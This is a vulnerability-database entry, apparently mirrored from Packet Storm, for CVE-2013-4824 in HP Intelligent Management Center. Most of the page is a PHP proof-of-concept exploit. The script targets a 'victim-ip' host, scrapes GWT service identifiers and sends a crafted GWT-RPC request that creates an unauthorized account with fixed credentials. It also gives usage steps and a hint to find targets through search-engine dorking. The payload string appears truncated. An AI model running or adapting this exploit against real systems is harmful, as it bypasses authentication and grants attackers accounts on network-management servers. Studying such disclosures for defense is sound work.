📄 HP Intelligent Management 5.1 E0201 Account Creation

🗓️ 27 Nov 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 114 Views

HP Intelligent Management Center vulnerability allows new account creation (CVE-2013-4824).

Reporter	Title	Published	Views	Family All 13
Circl	CVE-2013-4824	29 May 201815:50	–	circl
Check Point Advisories	HP Intelligent Management Center SOM euAccountSerivce Authentication Bypass (CVE-2013-4824)	22 Dec 201300:00	–	checkpoint_advisories
CVE	CVE-2013-4824	13 Oct 201310:00	–	cve
Cvelist	CVE-2013-4824	13 Oct 201310:00	–	cvelist
Tenable Nessus	HP Intelligent Management Center SOM Module < 7.0 E0101 Multiple Vulnerabilities	9 Jan 201400:00	–	nessus
Metasploit	HP Intelligent Management SOM Account Creation	23 Oct 201321:01	–	metasploit
NVD	CVE-2013-4824	13 Oct 201310:20	–	nvd
Packet Storm	HP Intelligent Management SOM Account Creation	31 Aug 202400:00	–	packetstorm
Prion	Authentication flaw	13 Oct 201310:20	–	prion
RedhatCVE	CVE-2013-4824	22 May 202511:12	–	redhatcve

=============================================================================================================================================
    | # Title     : HP Intelligent Management 5.1 E0201 Create a new account Vulnerability                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://buy.hpe.com/my/en/software/networking-software/intelligent-management-software/c/1009931441?selector=48             |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: Create a new account in HP Intelligent Management Center .
       
       (Related : https://packetstorm.news/files/id/180902/ Linked CVE numbers: CVE-2013-4824 ) .
    	
    [+] save code as poc.php.
    
    [+] Set taget : Line 19.
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    
    <?php
    
    function sendRequest($url, $data, $headers = [])
    {
        $ch = curl_init();
    
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
        $response = curl_exec($ch);
        curl_close($ch);
    
        return $response;
    }
    
    $target = "http://victim-ip:8080"; // عدّل عنوان الهدف
    $username = "msf";
    $password = "p4ssw0rd";
    
    // الخطوة 1: الحصول على strong name للخدمة
    $response = sendRequest("$target/servicedesk/servicedesk/servicedesk.nocache.js", "", ["User-Agent: Mozilla/5.0"]);
    preg_match("/unflattenKeylistIntoAnswers\(\['default', 'safari'\], '([0-9A-Fa-f]+)'\);/", $response, $matches);
    $serviceDesk = $matches[1] ?? null;
    
    if (!$serviceDesk) {
        die("فشل في العثور على service desk strong name\n");
    }
    
    echo "Service Desk Strong Name: $serviceDesk\n";
    
    // الخطوة 2: الحصول على strong name لخدمة الحسابات
    $response = sendRequest("$target/servicedesk/servicedesk/{$serviceDesk}.cache.html", "", ["User-Agent: Mozilla/5.0"]);
    preg_match("/'accountSerivce.gwtsvc', '([0-9A-Fa-f]+)', SERIALIZER_1/", $response, $matches);
    $accountService = $matches[1] ?? null;
    
    if (!$accountService) {
        die("فشل في العثور على AccountService strong name\n");
    }
    
    echo "AccountService Strong Name: $accountService\n";
    
    // الخطوة 3: إرسال الطلب لإنشاء الحساب
    $payload = "6|0|39|http://localhost:8080/servicedesk/servicedesk/|$accountService|com.h3c.imc.eu.client.account.AccountService|addAccount|...";
    $data = [
        'method' => 'POST',
        'uri'    => '/servicedesk/servicedesk/accountSerivce.gwtsvc',
        'ctype'  => 'text/x-gwt-rpc; charset=UTF-8',
        'headers' => [
            "X-GWT-Module-Base: $target/servicedesk/servicedesk/",
            "X-GWT-Permutation: $serviceDesk"
        ],
        'data' => $payload
    ];
    
    $response = sendRequest("$target/servicedesk/servicedesk/accountSerivce.gwtsvc", $payload, [
        "Content-Type: text/x-gwt-rpc; charset=UTF-8",
        "X-GWT-Module-Base: $target/servicedesk/servicedesk/",
        "X-GWT-Permutation: $serviceDesk"
    ]);
    
    if (strpos($response, "already exists") !== false) {
        echo "المستخدم $username موجود بالفعل.\n";
    } elseif (strpos($response, "added successfully") !== false) {
        echo "تم إنشاء الحساب بنجاح: $username / $password\n";
        echo "قم بتسجيل الدخول من: $target/servicedesk/ServiceDesk.jsp\n";
    } else {
        echo "فشل في إنشاء الحساب.\n";
    }
    
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

27 Nov 2025 00:00Current

6.7Medium risk

Vulners AI Score6.7

CVSS 27.5

EPSS0.777